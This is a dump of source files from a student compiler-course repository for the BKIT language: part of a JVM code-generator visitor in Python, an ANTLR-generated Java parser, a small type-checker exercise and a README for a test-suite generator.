in self.initVar]\r\n self.initVar = []\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n # condition\r\n self.emit.printout(expr2_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, o.frame))\r\n # loop stmt\r\n [self.visit(stmt, o_) for stmt in ctx.loop[1]]\r\n # update\r\n o_.isLeft = False\r\n idx1_code_load, _ = self.visit(ctx.idx1, o_)\r\n self.emit.printout(idx1_code_load)\r\n self.emit.printout(expr3_code)\r\n self.emit.printout(self.emit.emitADDOP('+', IntType(), o_.frame))\r\n self.emit.printout(idx1_code)\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, o.frame))\r\n o.frame.exitLoop()\r\n\r\n def visitBreak(self, ctx:Break, o):\r\n outL = o.frame.getBreakLabel()\r\n self.emit.printout(self.emit.emitGOTO(outL, o.frame))\r\n \r\n def visitContinue(self, ctx:Continue, o):\r\n inL = o.frame.getContinueLabel()\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n \r\n def visitReturn(self, ctx:Return, o):\r\n a = Access(o.frame, o.symbol, isLeft=False)\r\n typ = VoidType()\r\n if ctx.expr:\r\n expr_code, typ = self.visit(ctx.expr, a)\r\n self.ret.append(expr_code)\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitRETURN(typ, a.frame))\r\n o.setRet(typ)\r\n \r\n def visitDowhile(self, ctx:Dowhile, o):\r\n access = Access(o.frame, o.symbol, False)\r\n expr_code, _ = self.visit(ctx.exp, access)\r\n if expr_code == None:\r\n self.infer(ctx.expr, BoolType(), access)\r\n expr_code, _ = self.visit(ctx.exp, access)\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n # declaration\r\n access.symbol = [self.visit(decl, access) for decl in ctx.sl[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n # enter loop\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n [self.visit(stmt, access) for stmt in ctx.sl[1]]\r\n # condition\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, o.frame))\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, o.frame))\r\n o.frame.exitLoop()\r\n \r\n def visitCallStmt(self, ctx:CallStmt, o):\r\n method_sym = None\r\n for sym in o.symbol:\r\n if sym.name == ctx.method.name:\r\n method_sym = sym\r\n break\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n expr_codes = []\r\n if method_sym != None:\r\n # infer the args in case the function has been inferred\r\n # print(list(map(lambda x,y: (x,y), ctx.param, method_sym.mtype.partype)))\r\n for (expr, expect) in list(map(lambda x,y: (x,y), ctx.param, method_sym.mtype.partype)):\r\n expr_code, typ = self.visit(expr, access)\r\n if expr_code == None:\r\n self.infer(expr, expect, access)\r\n expr_code, typ = self.visit(expr, access)\r\n expr_codes.append([expr_code, typ])\r\n else:\r\n name = ctx.method.name\r\n partype = [None]*len(ctx.param)\r\n rettype = VoidType()\r\n typ = MType(partype, rettype)\r\n self.staticFunction.append(Symbol(name, typ, CName(self.className)))\r\n method_sym = self.staticFunction[-1]\r\n expr_codes = [self.visit(expr, access) for expr in ctx.param]\r\n [self.emit.printout(code) for code in [ret[0] for ret in expr_codes]]\r\n typ = None\r\n className = self.className\r\n if method_sym == None:\r\n typ = MType([ret[1] for ret in expr_codes], VoidType())\r\n self.staticFunction.append(Symbol(ctx.method.name, typ, CName(self.className)))\r\n else:\r\n typ = method_sym.mtype\r\n className = method_sym.value.value\r\n self.emit.printout(self.emit.emitINVOKESTATIC(className +\".\"+ctx.method.name, typ, o.frame))\r\n \r\n def visitCallExpr(self, ctx:CallExpr, o):\r\n method_sym = None\r\n for sym in o.symbol:\r\n if sym.name == ctx.method.name:\r\n method_sym = sym\r\n break\r\n # Not yet go through\r\n if method_sym == None:\r\n for method in self.staticFunction:\r\n if method.name == ctx.method.name:\r\n method_sym = method\r\n break\r\n if method_sym == None:\r\n o.frame.push()\r\n return None, None\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n expr_codes = []\r\n if method_sym != None:\r\n if any([p == None for p in method_sym.mtype.partype]):\r\n # print('come here: ', method_sym.mtype.rettype)\r\n return None, None\r\n partype = method_sym.mtype.partype\r\n # infer the args in case the function has been inferred\r\n # print(list(map(lambda x,y: (x,y), ctx.param, method_sym.mtype.partype)))\r\n for (idx, p) in enumerate(ctx.param):\r\n code, typ = self.visit(p, access)\r\n if code == None:\r\n if partype[idx] == None:\r\n partype[idx] = IntType()\r\n self.infer(p, partype[idx], access)\r\n code, typ =self.visit(p, access)\r\n partype[idx] = typ\r\n expr_codes.append((code,typ))\r\n else:\r\n expr_codes = [self.visit(expr, access) for expr in ctx.param]\r\n code = \"\"\r\n if len(expr_codes) > 1:\r\n code = reduce(lambda x,y: x + y, [ret[0] for ret in expr_codes], \"\")\r\n elif len(expr_codes) == 1:\r\n code = expr_codes[0][0]\r\n print('the code: ', code)\r\n typ = method_sym.mtype\r\n className = method_sym.value.value\r\n # print('name of sym: {} and name of method: {}'.format(3method_sym.name, ctx.method.name))\r\n code += self.emit.emitINVOKESTATIC(className +\".\"+ctx.method.name, typ, o.frame)\r\n return code, method_sym.mtype.rettype\r\n \r\n \"\"\"\r\n ! I dont know if we can use emitREADVAR for this\r\n TODOs: try some experiences\r\n \"\"\"\r\n def visitArrayCell(self, ctx, o):\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n code, typ = self.visit(ctx.arr, access)\r\n if typ.eleType == None:\r\n return None, typ.eleType\r\n idxs_code = [self.visit(expr, access)[0] for expr in ctx.idx]\r\n for idx_code in idxs_code[:-1]:\r\n code += idx_code + self.emit.emitALOAD(ArrayType(typ, [1]), o.frame)\r\n if o.isLeft:\r\n code += idxs_code[-1] + self.emit.emitASTORE(typ.eleType, o.frame)\r\n else:\r\n code += idxs_code[-1] + self.emit.emitALOAD(typ.eleType, o.frame)\r\n return code, typ.eleType\r\n \r\n def visitUnaryOp(self, ctx, o):\r\n expr, typ = self.visit(ctx.body, o)\r\n if expr == None:\r\n self.infer(ctx.body, BoolType(), o)\r\n expr, typ = self.visit(ctx.body, o)\r\n if ctx.op in ['!']:\r\n code = expr + self.emit.emitNOT(BoolType(), o.frame)\r\n return code, BoolType()\r\n elif ctx.op in ['-', '-.']:\r\n code = expr + self.emit.emitNEGOP(typ, o.frame)\r\n return code, typ\r\n \r\n def visitBinaryOp(self, ctx, o):\r\n l, ltyp = self.visit(ctx.left, o)\r\n r, rtyp = self.visit(ctx.right, o)\r\n if ltyp == None:\r\n if ctx.op in ['+', '-', '*', '\\\\', '%', '==', '!=', '<', '>', '<=', '>=']:\r\n self.infer(ctx.left, IntType(), o)\r\n elif ctx.op in ['||', '&&']:\r\n self.infer(ctx.left, BoolType(), o)\r\n else:\r\n self.infer(ctx.left, FloatType(), o)\r\n l, ltyp = self.visit(ctx.left, o)\r\n elif rtyp == None:\r\n if ctx.op in ['+', '-', '*', '\\\\', '%', '==', '!=', '<', '>', '<=', '>=']:\r\n self.infer(ctx.right, IntType(), o)\r\n elif ctx.op in ['||', '&&']:\r\n self.infer(ctx.right, BoolType(), o)\r\n else:\r\n self.infer(ctx.right, FloatType(), o)\r\n r, rtyp = self.visit(ctx.right, o)\r\n typ = ltyp\r\n code, rettyp = None, None\r\n\r\n if ctx.op in ['+', '-', '+.', '-.']:\r\n if ctx.op in ['+', '+.']:\r\n code = l + r + self.emit.emitADDOP('+', typ, o.frame)\r\n rettyp = typ\r\n else:\r\n code = l + r + self.emit.emitADDOP('-', typ, o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['*', '*.', '\\\\', '\\\\.', '%']:\r\n if ctx.op in ['*', '*.']:\r\n code = l + r + self.emit.emitMULOP('*', typ, o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['\\\\', '\\\\.']:\r\n code = l + r + self.emit.emitMULOP('\\\\', typ, o.frame)\r\n rettyp = typ\r\n else:\r\n code = l + r + self.emit.emitMOD(o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['&&', '||']:\r\n if ctx.op in ['&&']:\r\n code = l + r + self.emit.emitANDOP(o.frame)\r\n rettyp = BoolType()\r\n else:\r\n code = l + r + self.emit.emitOROP(o.frame)\r\n rettyp = BoolType()\r\n elif ctx.op in ['==', '!=', '<', '>', '<=', '>=', '=/=', '<.', '>.', '<=.', '>=.']:\r\n if ctx.op in ['==']:\r\n code = l + r + self.emit.emitREOP('==', typ, o.frame)\r\n elif ctx.op in ['!=', '=/=']:\r\n code = l + r + self.emit.emitREOP('!=', typ, o.frame)\r\n elif ctx.op in ['<', '<.']:\r\n code = l + r + self.emit.emitREOP('<', typ, o.frame)\r\n elif ctx.op in ['>', '>.']:\r\n code = l + r + self.emit.emitREOP('>', typ, o.frame)\r\n elif ctx.op in ['<=', '<=.']:\r\n code = l + r + self.emit.emitREOP('<=', typ, o.frame)\r\n elif ctx.op in ['>=', '>=.']:\r\n code = l + r + self.emit.emitREOP('>=', typ, o.frame)\r\n rettyp = BoolType()\r\n return code, rettyp\r\n \r\n def visitIntLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHICONST(ctx.value, o.frame)\r\n return code, IntType()\r\n def visitFloatLiteral(self,ctx,o):\r\n code = self.emit.emitPUSHFCONST(str(ctx.value), o.frame)\r\n return code, FloatType()\r\n def visitStringLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHCONST('\"' + ctx.value + '\"', StringType(), o.frame)\r\n return code, StringType()\r\n def visitBooleanLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHICONST(str(ctx.value).lower(), o.frame)\r\n return code, BoolType()\r\n def visitArrayLiteral(self, ctx, o):\r\n access = o\r\n # lit_code = list(map(lambda x: self.visit(x, access), ctx.value))\r\n # lit_code = [ret[0] for ret in lit_code]\r\n # lit_code = list(map(lambda code, idx: self.emit.emitDUP(access.frame) + \\\r\n # self.emit.emitPUSHICONST(idx, access.frame) + code + \\\r\n # self.emit.emitASTORE(ele_type, access.frame), lit_code, range(len(lit_code))))\r\n init_code = \"\"\r\n ele_type = None\r\n for (idx, lit) in enumerate(ctx.value):\r\n init_code += self.emit.emitDUP(access.frame)\r\n init_code += self.emit.emitPUSHICONST(idx, access.frame)\r\n code, ele_type = self.visit(lit, access)\r\n init_code += code\r\n init_code += self.emit.emitASTORE(ele_type, access.frame)\r\n access.frame.maxOpStackSize += 1\r\n code = self.emit.emitANEWARRAY(ele_type, len(ctx.value), access.frame)\r\n code = code + init_code\r\n if isinstance(ele_type, ArrayType):\r\n # print(ele_type.dimen)\r\n if isinstance(ele_type.dimen, tuple):\r\n ele_type.dimen = ele_type.dimen[0]\r\n ele_type.dimen = [len(ctx.value)] + ele_type.dimen\r\n else:\r\n ele_type = ArrayType(ele_type, [len(ctx.value)])\r\n return code, ele_type\r\n def visitId(self, ctx, o):\r\n id_sym = None\r\n for _sym in o.symbol:\r\n if _sym.name == ctx.name:\r\n id_sym = _sym\r\n break\r\n if id_sym.mtype == None:\r\n return None, id_sym.mtype\r\n elif isinstance(id_sym.mtype, ArrayType) and id_sym.mtype.eleType == None:\r\n return None, id_sym.mtype\r\n # print('name: {}, mtype: {}, index: {}'.format(id_sym.name, id_sym.mtype, id_sym.value.value))\r\n if o.isLeft:\r\n if isinstance(id_sym.value, Index):\r\n # print('name: {}, mtype: {}, index: {}'.format(id_sym.name, id_sym.mtype, id_sym.value.value))\r\n code = self.emit.emitWRITEVAR(id_sym.name, id_sym.mtype, id_sym.value.value, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n code = self.emit.emitPUTSTATIC(id_sym.value.value + '.' + ctx.name, id_sym.mtype, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n if isinstance(id_sym.value, Index):\r\n code = self.emit.emitREADVAR(id_sym.name, id_sym.mtype, id_sym.value.value, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n code = self.emit.emitGETSTATIC(id_sym.value.value + '.' + ctx.name, id_sym.mtype, o.frame)\r\n return code, id_sym.mtype\r\n\r\n \r\n def inferId(self, id, expect_type, o):\r\n for sym in o.symbol:\r\n if id.name == sym.name:\r\n if sym.mtype == None:\r\n sym.mtype = expect_type\r\n if isinstance(sym.mtype, ArrayType):\r\n if sym.mtype.eleType == None:\r\n return None, sym.mtype\r\n break\r\n \r\n def inferArray(self, arr, expect_type, o):\r\n access = Access(o.frame, o.symbol, isLeft=o.isLeft)\r\n code, typ = self.visit(arr.arr, access)\r\n if typ.eleType == None:\r\n typ.eleType = expect_type\r\n ele_type = typ.eleType\r\n code, typ = self.visit(arr.arr, access)\r\n lit = None\r\n dimen = typ.dimen[0]\r\n if isinstance(typ.eleType, IntType):\r\n lit = ArrayLiteral([IntLiteral(0)]*dimen[-1])\r\n elif isinstance(typ.eleType, BoolType):\r\n lit = ArrayLiteral([BooleanLiteral(False)]*dimen[-1])\r\n elif isinstance(typ.eleType, StringType):\r\n lit = ArrayLiteral([StringLiteral(\"\")]*dimen[-1])\r\n elif isinstance(typ.eleType, FloatType):\r\n lit = ArrayLiteral([FloatType(0.0)]*dimen[-1])\r\n for d in dimen[::-1][1:]:\r\n lit = ArrayLiteral([lit]*d)\r\n lit_code, _ = self.visitArrayLiteral(lit, access)\r\n code = lit_code + code\r\n self.emit.printout(code)\r\n \r\n def inferCallExpr(self, callee, expect_type, o):\r\n # args_and_types = [self.visit(p,o) for p in callee.param]\r\n name = callee.method.name\r\n method_sym = None\r\n for method in self.staticFunction:\r\n if method.name == name:\r\n method_sym = method\r\n break\r\n if method_sym == None:\r\n partype = [None]*len(callee.param)\r\n rettype = expect_type\r\n typ = MType(partype, rettype)\r\n self.staticFunction.append(Symbol(name, typ, CName(self.className)))\r\n method_sym = self.staticFunction[-1]\r\n partype = method_sym.mtype.partype\r\n \"\"\"\r\n TODOs: infer the function that be invokeed before declared\r\n e.g.: foo(foo(x))\r\n \"\"\"\r\n args_and_types = []\r\n access = o\r\n for (idx, p) in enumerate(callee.param):\r\n code, typ = self.visit(p, access)\r\n if code == None:\r\n if partype[idx] == None:\r\n partype[idx] = IntType()\r\n self.infer(p, partype[idx], access)\r\n code, typ = self.visit(p, access)\r\n partype[idx] = typ\r\n # access = o\r\n # for p in callee.param:\r\n # code, typ = self.visit(p, access)\r\n # if code == None:\r\n # code, typ = self.infer(p, access)\r\n # for (expr, expect) in list(map(lambda x,y: (x,y), callee.param, method_sym.mtype.partype)):\r\n # expr_code, typ = self.visit(expr, access)\r\n # if expr_code == None:\r\n # self.infer(expr, expect, access)\r\n # expr_code, typ = self.visit(expr, access)\r\n # expr_codes.append([expr_code, typ])\r\n\r\n def infer(self, x, expect_type, o):\r\n if isinstance(x, Id):\r\n self.inferId(x, expect_type, o)\r\n return None\r\n elif isinstance(x, ArrayCell):\r\n self.inferArray(x, expect_type, o)\r\n return None\r\n elif isinstance(x, CallExpr):\r\n return self.inferCallExpr(x, expect_type, o)" }, { "alpha_fraction": 0.6155486106872559, "alphanum_fraction": 0.6485156416893005, "avg_line_length": 35.957576751708984, "blob_id": "f28fc1f21571d334de12323b1bccbb5d12f82f4b", "content_id": "4fc95ecb062be26a9aa62ff094da0785f4c14bb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6097, "license_type": "no_license", "max_line_length": 97, "num_lines": 165, "path": "/LexicalAnalysis/BKITParser.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.misc.*;\nimport org.antlr.v4.runtime.tree.*;\nimport java.util.List;\nimport java.util.Iterator;\nimport java.util.ArrayList;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITParser extends Parser {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tREAL_NUMBER=1, ID=2, ILLEGAL_ESCAPE=3, UNCLOSE_STRING=4, COMMENT=5, UNTERMINATED_COMMENT=6, \n\t\tERROR_CHAR=7, WS=8, Integer_literal=9, Float_literal=10, Boolean_literal=11, \n\t\tString_literal=12, BODY=13, BREAK=14, CONTINUE=15, DO=16, ELSE=17, ELSELF=18, \n\t\tELSEIF=19, ENDBODY=20, ENDFOR=21, ENDWHILE=22, FOR=23, FUNCTION=24, IF=25, \n\t\tPARAMETER=26, RETURN=27, THEN=28, VAR=29, WHILE=30, TRUE=31, FALSE=32, \n\t\tENDDO=33, PLUS_INT=34, PLUS_FLOAT=35, MINUS_INT=36, MINUS_FLOAT=37, STAR_INT=38, \n\t\tSTAR_FLOAT=39, DIV_INT=40, DIV_FLOAT=41, MOD=42, NOT=43, AND=44, OR=45, \n\t\tEQUAL=46, NOT_EQUAL_INT=47, LESS_INT=48, GREATER_INT=49, LESS_OR_EQUAL_INT=50, \n\t\tGREATER_OR_EQUAL_INT=51, NOT_EQUAL_FLOAT=52, LESS_FLOAT=53, GREATER_FLOAT=54, \n\t\tLESS_OR_EQUAL_FLOAT=55, GREATER_OR_EQUAL_FLOAT=56, LEFT_PAREN=57, RIGHT_PARENT=58, \n\t\tLEFT_BRACKET=59, RIGHT_BRACKET=60, LEFT_BRACE=61, RIGHT_BRACE=62, COLON=63, \n\t\tDOT=64, SEMI=65, COMMA=66;\n\tpublic static final int\n\t\tRULE_program = 0;\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"program\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, null, null, null, null, null, null, null, null, null, \n\t\t\tnull, \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n\t\t\t\"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n\t\t\t\"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n\t\t\t\"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \n\t\t\t\"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \n\t\t\t\"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \n\t\t\t\"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n\t\t\t\"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n\t\t\t\"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \n\t\t\t\"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \n\t\t\t\"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n\t\t\t\"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n\t\t\t\"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n\t\t\t\"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n\t\t\t\"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n\t\t\t\"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \n\t\t\t\"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \n\t\t\t\"COMMA\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic BKITParser(TokenStream input) {\n\t\tsuper(input);\n\t\t_interp = new ParserATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\tpublic static class ProgramContext extends ParserRuleContext {\n\t\tpublic ProgramContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_program; }\n\t\t@Override\n\t\tpublic void enterRule(ParseTreeListener listener) {\n\t\t\tif ( listener instanceof BKITListener ) ((BKITListener)listener).enterProgram(this);\n\t\t}\n\t\t@Override\n\t\tpublic void exitRule(ParseTreeListener listener) {\n\t\t\tif ( listener instanceof BKITListener ) ((BKITListener)listener).exitProgram(this);\n\t\t}\n\t}\n\n\tpublic final ProgramContext program() throws RecognitionException {\n\t\tProgramContext _localctx = new ProgramContext(_ctx, getState());\n\t\tenterRule(_localctx, 0, RULE_program);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3D\\7\\4\\2\\t\\2\\3\\2\\3\"+\n\t\t\"\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.549582302570343, "alphanum_fraction": 0.5586632490158081, "avg_line_length": 28.602149963378906, "blob_id": "fa5a52dfe28716ebf6a09f777d371f75ce26a784", "content_id": "a6c103bdd52694fd83b1113ce0d47a30075ddc35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2753, "license_type": "no_license", "max_line_length": 83, "num_lines": 93, "path": "/type/Q2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Program: pass #decl:List[VarDecl],exp:Exp\n\nclass VarDecl: pass #name:str,typ:Type\n\nclass Type(ABC): pass #abstract class\n\nclass IntType(Type): pass\n\nclass FloatType(Type): pass\n\nclass BoolType(Type): pass\n\nclass Exp(ABC): pass #abstract class\n\nclass BinOp(Exp): pass #op:str,e1:Exp,e2:Exp #op is +,-,*,/,&&,||, >, <, ==, or !=\n\nclass UnOp(Exp): pass #op:str,e:Exp #op is -, !\n\nclass IntLit(Exp): pass #val:int\n\nclass FloatLit(Exp): pass #val:float\n\nclass BoolLit(Exp): pass #val:bool\n\nclass Id(Exp): pass #name:str\n\n\nfrom functools import reduce\nclass StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o):\n env = reduce(lambda lst, x: lst + [self.visitVarDecl(x)], ctx.decl, [])\n self.visit(ctx.exp, env)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n return {\"name\" : ctx.name, \"type\": ctx.typ}\n\n def visitBinOp(self,ctx:BinOp,o):\n e1 = self.visit(ctx.e1, o)\n e2 = self.visit(ctx.e2, o)\n if ctx.op in ['+', '-', '*']:\n if isinstance(e1, BoolLit) or isinstance(e2, BoolLit):\n raise TypeMismatchInExpression(ctx)\n if isinstance(e1, FloatLit) or isinstance(e2, FloatLit):\n return FloatLit(0)\n else:\n return IntLit(0)\n if ctx.op in ['/']:\n if isinstance(e1, BoolLit) or isinstance(e2, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return FloatLit(0)\n \n if ctx.op in ['&&', '||']:\n if isinstance(e1, BoolLit) and isinstance(e2, BoolLit):\n return BoolLit(True)\n raise TypeMismatchInExpression(ctx)\n else:\n if type(e1) != type(e2):\n raise TypeMismatchInExpression(ctx)\n return BoolLit(True)\n\n def visitUnOp(self,ctx:UnOp,o):\n e = self.visit(ctx.e, o)\n if ctx.op in ['-']:\n if isinstance(e, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return e\n if ctx.op in ['!']:\n if not isinstance(e, BoolLit):\n raise TypeMismatchInExpression(ctx)\n return e\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx,o):\n return FloatLit(0)\n\n def visitBoolLit(self,ctx,o):\n return BoolLit(True)\n\n def visitId(self,ctx,o):\n a = [idx for (idx, d) in enumerate(o) if d[\"name\"] == ctx.name]\n if len(a) == 0:\n raise UndeclaredIdentifier(ctx.name)\n else:\n typ = o[a[0]][\"type\"]\n if isinstance(typ, IntType):\n return IntLit(0)\n if isinstance(typ, FloatType):\n return FloatLit(0)\n else:\n return BoolLit(True)\n" }, { "alpha_fraction": 0.7094051241874695, "alphanum_fraction": 0.7098070979118347, "avg_line_length": 33.095890045166016, "blob_id": "237ff000256699e49b49f3b9ef8fc43cddf05a30", "content_id": "259ffa9d3794655fa251cab0e8576b6fc4fc98eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 317, "num_lines": 73, "path": "/Assignments/assignment2/src1.1/README.md", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# AST TREE GEN\n\n## TEST_GEN_TOOL\n\n**Download files: AST_GEN_TEST.py, gen_test.py then place them in the same folder with AST.py and run.py respectively**\n\nYou need to install some module if not installed, like this one:\n\n```bash\npip install tqdm\n```\n\nTo generate the ASTGenSuite.py, you need to write all testcases in format .txt which are store a same <test_folder_dir>. After prepare all the testcase, or some of them, you can gen by the gen_test.py. To see help:\n\n```bash\npython gen_test.py -h\n\noptional arguments:\n -h, --help show this help message and exit\n --testcase_dir TESTCASE_DIR\n the testcase directory where you store the testcase in *.txt format\n --solution_dir SOLUTION_DIR\n the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\n --suite_dir SUITE_DIR\n the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\n --gen_sol GEN_SOL active the gen solution, you need to place the AST_GEN_TEST.py in the same dir with AST.py\n```\n\nFor the first time, you have to active the --gen_sol by True value to generate the solution in full options in the <sol_folder_dir>.\n\n```bash\npython gen_test.py --testcase_dir <test_folder_dir> --solution_dir <sol_folder_dir> --suite_dir ASTGenSuite.py --gen_sol True\n```\n\nYou can also ignore any of them if you satisfy with the default of them below:\n\n<suite_dir>: './test/ASTGenSuite.py'\n\n<test_folder_dir>: './test/testcases/'\n\n<sol_folder_dir>: './test/solutions/'\n\n<gen_sol>: False\n\n## GEN TESTCASE\n\nFirst of all, let replace the AST module by the AST_GEN_TEST.py:\n\n```python\n# from AST import *\nfrom AST_GEN_TEST import * \n```\n\nThen run something like:\n\n```bash\npython gen_test.py --gen_sol True\n```\n\nAfter this, there will be a full of testcases ASTGenSuite.py. Inactive the AST_GEN_TEST and active AST:\n\n```python\nfrom AST import *\n# from AST_GEN_TEST import * \n```\n\nNow, you can use this AST_GEN_SUITE to check your ASTGeneration as normal as nothing happen.\n\n```bash\npython run.py test 